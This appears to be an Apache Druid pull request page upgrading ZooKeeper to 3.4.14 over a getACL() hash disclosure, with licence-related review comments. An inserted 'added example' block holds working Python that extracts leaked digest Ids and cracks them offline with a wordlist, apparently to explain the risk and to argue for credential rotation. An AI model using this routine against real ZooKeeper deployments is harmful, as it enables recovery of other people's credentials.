
Zookeeper version is updated.#8363

Merged
clintropolis merged 4 commits into apache:master from kamaci:feature/zookeeper_version
Aug 25, 2019

Conversation

@kamaci (Member) commented Aug 21, 2019

Fixes #8362.

Description

Zookeeper version should be upgraded to version 3.4.14 or later because it has a vulnerability:

An issue is present in Apache ZooKeeper 1.0.0 to 3.4.13 and 3.5.0-alpha to 3.5.4-beta. ZooKeeper's getACL() command doesn't check any permission when retrieves the ACLs of the requested node and returns all information contained in the ACL Id field as plaintext string. DigestAuthenticationProvider overloads the Id field with the hash value that is used for user authentication. As a consequence, if Digest Authentication is in use, the unsalted hash value will be disclosed by getACL() request for unauthenticated or unprivileged users.

and has a critical bug.

Zookeeper version is upgraded to 3.4.14


This PR has:

  • been self-reviewed.
  • added documentation for new or modified features or behaviors.
  • added Javadocs for most classes and all non-trivial methods. Linked related entities via Javadoc links.
  • added comments explaining the "why" and the intent of the code wherever would not be obvious for an unfamiliar reader.
  • added unit tests or modified existing tests to cover new code paths.
  • added integration tests.
  • been tested in a test Druid cluster.
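Added example, not part of this PR or of the Druid or ZooKeeper code bases: it shows why the getACL() disclosure described above matters. The helper `zk_digest` reproduces the format that ZooKeeper's DigestAuthenticationProvider uses for scheme "digest" credentials (`user:base64(sha1("user:password"))`, no salt); the getACL() response, the wordlist and the `perms/scheme/id` entry shape are constructed for the demo and are not ZooKeeper's wire format.

```python
import base64
import hashlib
from typing import Dict, Iterable, List, Optional, Tuple


def zk_digest(user: str, password: str) -> str:
    """Build the scheme "digest" credential the way ZooKeeper's
    DigestAuthenticationProvider.generateDigest() does: the user name,
    a colon, then base64(SHA-1("user:password")). No salt is involved,
    and this exact string is what sits in the ACL Id field."""
    raw = f"{user}:{password}".encode("utf-8")
    return f"{user}:{base64.b64encode(hashlib.sha1(raw).digest()).decode('ascii')}"


def parse_digest_acl_id(acl_id: str) -> Tuple[str, bytes]:
    """Split a digest ACL Id into (user, raw SHA-1 bytes), rejecting
    anything that is not shaped like one."""
    user, sep, b64 = acl_id.partition(":")
    if not sep or not user:
        raise ValueError(f"not a digest id: {acl_id!r}")
    sha = base64.b64decode(b64, validate=True)
    if len(sha) != hashlib.sha1().digest_size:
        raise ValueError("digest is not a SHA-1 value")
    return user, sha


def leaked_digest_ids(acls: List[Dict[str, object]]) -> List[str]:
    """Pick the digest-scheme Ids out of a getACL() result. The entry
    shape used here (perms/scheme/id) is an assumption made for this
    example: it mirrors the three ACL fields but is not ZooKeeper's
    wire format."""
    return [str(a["id"]) for a in acls if a.get("scheme") == "digest"]


def crack_digest_id(acl_id: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on a leaked digest Id. The user name is
    part of the Id and the hash is unsalted, so every guess costs one
    SHA-1 and no further request to the server is needed."""
    user, target = parse_digest_acl_id(acl_id)
    for pw in candidates:
        if hashlib.sha1(f"{user}:{pw}".encode("utf-8")).digest() == target:
            return pw
    return None


# Constructed sample: what a vulnerable server would hand back to an
# unauthenticated getACL() on a node protected with digest auth.
SAMPLE_GETACL = [
    {"perms": 31, "scheme": "digest", "id": zk_digest("druid", "Passw0rd!")},
    {"perms": 1, "scheme": "world", "id": "anyone"},
]

# Constructed wordlist for the demo.
SAMPLE_WORDLIST = ["password", "druid", "zookeeper", "Passw0rd!", "changeme"]


def demo() -> Optional[str]:
    """Recover the password behind the sample response, or None."""
    for acl_id in leaked_digest_ids(SAMPLE_GETACL):
        pw = crack_digest_id(acl_id, SAMPLE_WORDLIST)
        if pw is not None:
            return pw
    return None


if __name__ == "__main__":
    print(demo())
```

The practical consequence for an operator: upgrading to 3.4.14 stops further disclosure, but any digest Id that was already readable stays crackable offline, so the digest credentials should be rotated after the upgrade rather than just left in place.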

@clintropolis (Member) commented

This is a somewhat duplicate of #8177, but maybe still worth going ahead and doing since the other is tied up in the curator issue.

After #7998 and #8306 (which was just merged and the cause of your conflicts), LICENSE.BINARY and NOTICE.BINARY are both autogenerated from the contents of licenses.yaml at the root of the project. #8367 will add instructions to the PR template indicating that this should be done if dependency versions are bumped, but it is not merged yet.

Could you please fix the conflicts and update the zookeeper entry's 'version' and 'notice' text in licenses.yaml?

For the notice, it looks like changing to:

Apache ZooKeeper
Copyright 2009-2019 The Apache Software Foundation

should be sufficient.

kamaci force-pushed the feature/zookeeper_version branch from 2ea099f to 1dd788e on August 22, 2019 09:02

@kamaci (Member, Author) commented Aug 22, 2019

@clintropolis I've updated my PR.

@clintropolis (Member) left a review comment

Due to https://issues.apache.org/jira/browse/ZOOKEEPER-3367, it looks like we need to exclude spotbugs-annotations from the zookeeper dependency since it is LGPL licensed (which is the reason all of the tests on this PR are failing).

        <exclusion>
          <groupId>com.github.spotbugs</groupId>
          <artifactId>spotbugs-annotations</artifactId>
        </exclusion>

in the root pom.xml entry for zookeeper.

Additionally, for some reason I don't entirely understand, updating the zk version also breaks materialized-view-maintenance and materialized-view-selection, which need this:

        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.hamcrest</groupId>
            <artifactId>hamcrest-all</artifactId>
            <scope>test</scope>
        </dependency>

added to extensions-contrib/materialized-view-maintenance/pom.xml and extensions-contrib/materialized-view-selection/pom.xml respectively.

After these changes, everything was able to compile and the license check was able to pass successfully for me.
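Added example, not part of this PR or of Druid's build: a small check for the exclusion requested in the review, so that a later version bump cannot quietly drop it and pull the LGPL artifact back in. The two pom fragments below are constructed (they are not Druid's root pom, which carries other exclusions as well), and the `LICENSE_POLICY` mapping is a hypothetical policy table: dependency coordinates on the left, the exclusions that dependency must declare on the right.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Set

# Maven poms live in this default namespace, so element lookups must be qualified.
POM_NS = "http://maven.apache.org/POM/4.0.0"


def _tag(name: str) -> str:
    """Qualify a POM element name with the Maven namespace."""
    return f"{{{POM_NS}}}{name}"


def _coord(el: ET.Element) -> str:
    """'groupId:artifactId' of a <dependency> or <exclusion> element."""
    return f"{el.findtext(_tag('groupId'))}:{el.findtext(_tag('artifactId'))}"


def dependency_exclusions(pom_xml: str) -> Dict[str, Set[str]]:
    """Map every declared dependency (in <dependencies> and
    <dependencyManagement> alike) to the set of coordinates it excludes."""
    root = ET.fromstring(pom_xml)
    result: Dict[str, Set[str]] = {}
    for dep in root.iter(_tag("dependency")):
        result.setdefault(_coord(dep), set()).update(
            _coord(ex) for ex in dep.iter(_tag("exclusion"))
        )
    return result


def missing_exclusions(pom_xml: str, policy: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """For each policy entry 'dependency -> exclusions it must carry',
    report what the pom lacks. A dependency the pom does not declare at
    all is out of scope here: nothing in this pom pulls its transitives."""
    found = dependency_exclusions(pom_xml)
    gaps: Dict[str, Set[str]] = {}
    for dep, required in policy.items():
        if dep not in found:
            continue
        lacking = required - found[dep]
        if lacking:
            gaps[dep] = lacking
    return gaps


# Constructed fragment: the zookeeper entry after the version bump but
# before the exclusion was added (the state in which the license check fails).
POM_BEFORE = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>org.apache.zookeeper</groupId>
        <artifactId>zookeeper</artifactId>
        <version>3.4.14</version>
      </dependency>
    </dependencies>
  </dependencyManagement>
</project>
"""

# Constructed fragment: the same entry with the exclusion from the review.
POM_AFTER = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencyManagement>
    <dependencies>
      <dependency>
        <groupId>org.apache.zookeeper</groupId>
        <artifactId>zookeeper</artifactId>
        <version>3.4.14</version>
        <exclusions>
          <exclusion>
            <groupId>com.github.spotbugs</groupId>
            <artifactId>spotbugs-annotations</artifactId>
          </exclusion>
        </exclusions>
      </dependency>
    </dependencies>
  </dependencyManagement>
</project>
"""

# Hypothetical policy table for this example.
LICENSE_POLICY = {
    "org.apache.zookeeper:zookeeper": {"com.github.spotbugs:spotbugs-annotations"},
}


if __name__ == "__main__":
    print("before:", missing_exclusions(POM_BEFORE, LICENSE_POLICY))
    print("after: ", missing_exclusions(POM_AFTER, LICENSE_POLICY))
```

Run against the real root pom this reports an empty dict when the exclusion is in place and names the missing coordinate otherwise; it complements, rather than replaces, the project's own license check, which works from the resolved dependency tree and licenses.yaml rather than from the pom text.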

Comment thread: licenses.yaml

@kamaci (Member, Author) commented Aug 23, 2019

I've updated my PR.

Comment thread: licenses.yaml (quoted lines)

notices:
  - zookeeper: |
      Apache ZooKeeper
      Copyright 2009-2012 The Apache Software Foundation

@clintropolis (Member) commented
Oops, you've updated the notice for the zookeeper bundled in the hadoop-client, instead of the one in core druid that you actually updated the version for (notice starts on line 1458).

@kamaci (Member, Author) commented
👍

@clintropolis (Member) left a review comment
lgtm, thanks 👍

@clintropolis clintropolis merged commit 02fe3db into apache:master Aug 25, 2019
@clintropolis clintropolis added this to the 0.16.0 milestone Aug 28, 2019
Development

Successfully merging this pull request may close these issues.

Upgrade Zookeper Version to 3.4.14

2 participants